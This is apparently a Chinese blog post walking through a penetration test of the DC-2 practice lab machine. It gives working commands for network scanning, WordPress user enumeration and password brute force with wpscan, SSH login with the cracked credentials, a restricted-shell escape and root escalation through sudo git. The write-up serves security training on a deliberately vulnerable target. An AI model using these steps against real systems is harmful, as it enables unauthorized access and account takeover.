DC-2靶机渗透测试报告

2022-08-10 19:02:54 浏览数 (1)

前言

开启征程——DC2

老样子,先内网扫描一波

代码语言:javascript复制
arp-scan -l

接着nmap扫一下他的端口

代码语言:javascript复制
nmap -p1-65535 -A -sV 192.168.232.142

ssh默认端口不是22?竟给改成了7744

打开网页发现会打不开,这时就需要设置hosts文件才能访问

代码语言:javascript复制
vi /etc/hosts
#输入i进行修改
192.168.232.142         dc-2
#保存返回 输入:x                                                                                                                                           
cat /etc/hosts

此时访问 http://dc-2 即可,打开发现是wp的

发现flag1

根据提示需要cewl,生成密码

代码语言:javascript复制
cewl -w passwords.txt http://dc-2
cat passwords.txt

接着我们使用专门扫wp的wpscan扫描用户

代码语言:javascript复制
wpscan --url http://dc-2 --enumerate u

最后成功得到三个用户名:admin、tom、jerry,并创建user.txt将其放入

然后我们就可以根据所得user和passwords的字典用wpscan进行爆破

代码语言:javascript复制
wpscan --ignore-main-redirect --url 192.168.232.142 -U user.txt -P passwords.txt --force

最后我们成功爆破出了账号密码

代码语言:javascript复制
[SUCCESS] - jerry / adipiscing                        [SUCCESS] - tom / parturient

到这里,我们便可以ssh连进去了

代码语言:javascript复制
ssh tom@192.168.232.142 -p 7744
parturient

进去后发现shell被限制了,于是我们需要绕过rbash,然后设置环境变量,最终成功cat到flag3

代码语言:javascript复制
whoami

BASH_CMDS[a]=/bin/sh;a
/bin/bash

export PATH=$PATH:/bin/

ls
cat flag3.txt

根据提示我们再切换成用户jerry的,在jerry用户下得到flag4

代码语言:javascript复制
su jerry
adipiscing

cd /home/jerry
ls
cat flag4.txt

Go on - git outta here!!!! 我们接着git提权

代码语言:javascript复制
sudo git -p help config
!/bin/bash
代码语言:javascript复制
whoami
ls /root
cat /root/final-flag.txt

0 人点赞